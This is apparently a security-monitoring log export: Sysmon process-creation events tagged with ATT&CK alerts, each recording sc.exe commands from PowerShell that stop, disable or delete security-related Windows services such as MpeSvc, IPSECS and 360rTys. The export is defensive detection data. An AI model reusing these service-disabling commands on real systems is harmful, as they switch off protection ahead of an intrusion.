+Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WifiService +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: 
""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WifiService",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:57.877541600Z"",""eventRecordID"":""2970"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:57.848\r\nProcessGuid: {df9fc3d3-b3b1-5ecf-0000-0010fc7e2600}\r\nProcessId: 1496\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WifiService\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:57.848"",""processGuid"":""{df9fc3d3-b3b1-5ecf-0000-0010fc7e2600}"",""processId"":""1496"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WifiService"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:26.169",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:57.797 +ProcessGuid: {df9fc3d3-b3b1-5ecf-0000-0010557d2600} +ProcessId: 7928 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete SRDSL +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete SRDSL",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:57.819116700Z"",""eventRecordID"":""2968"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:57.797\r\nProcessGuid: {df9fc3d3-b3b1-5ecf-0000-0010557d2600}\r\nProcessId: 7928\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete SRDSL\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:57.797"",""processGuid"":""{df9fc3d3-b3b1-5ecf-0000-0010557d2600}"",""processId"":""7928"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete SRDSL"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:26.152",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:57.773 +ProcessGuid: {df9fc3d3-b3b1-5ecf-0000-00107f7c2600} +ProcessId: 1160 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SRDSL +CurrentDirectory: C:\Users\John 
Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SRDSL",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:57.777185100Z"",""eventRecordID"":""2967"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:57.773\r\nProcessGuid: {df9fc3d3-b3b1-5ecf-0000-00107f7c2600}\r\nProcessId: 1160\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SRDSL\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:57.773"",""processGuid"":""{df9fc3d3-b3b1-5ecf-0000-00107f7c2600}"",""processId"":""1160"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SRDSL"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:25.956",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:57.540 +ProcessGuid: {df9fc3d3-b3b1-5ecf-0000-00105c732600} +ProcessId: 7360 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) 
+Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop MpeSvc +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop MpeSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:57.645949300Z"",""eventRecordID"":""2964"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:57.540\r\nProcessGuid: {df9fc3d3-b3b1-5ecf-0000-00105c732600}\r\nProcessId: 7360\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop MpeSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: 
{df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:57.540"",""processGuid"":""{df9fc3d3-b3b1-5ecf-0000-00105c732600}"",""processId"":""7360"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop MpeSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:25.866",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:57.215 +ProcessGuid: 
{df9fc3d3-b3b1-5ecf-0000-001013662600} +ProcessId: 6948 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop IPSECS +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop IPSECS",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:57.218465000Z"",""eventRecordID"":""2961"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:57.215\r\nProcessGuid: {df9fc3d3-b3b1-5ecf-0000-001013662600}\r\nProcessId: 6948\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\sc.exe\"" Stop IPSECS\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:57.215"",""processGuid"":""{df9fc3d3-b3b1-5ecf-0000-001013662600}"",""processId"":""6948"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop IPSECS"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 
29, 2020 @ 14:19:25.852",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:57.186 +ProcessGuid: {df9fc3d3-b3b1-5ecf-0000-0010d2632600} +ProcessId: 7628 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config IPSECS Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config IPSECS Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:57.191748900Z"",""eventRecordID"":""2960"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:57.186\r\nProcessGuid: {df9fc3d3-b3b1-5ecf-0000-0010d2632600}\r\nProcessId: 7628\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 
(WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config IPSECS Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:57.186"",""processGuid"":""{df9fc3d3-b3b1-5ecf-0000-0010d2632600}"",""processId"":""7628"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config IPSECS Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:25.838",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:57.149 +ProcessGuid: {df9fc3d3-b3b1-5ecf-0000-0010c7612600} +ProcessId: 3572 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop 360rTys +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 
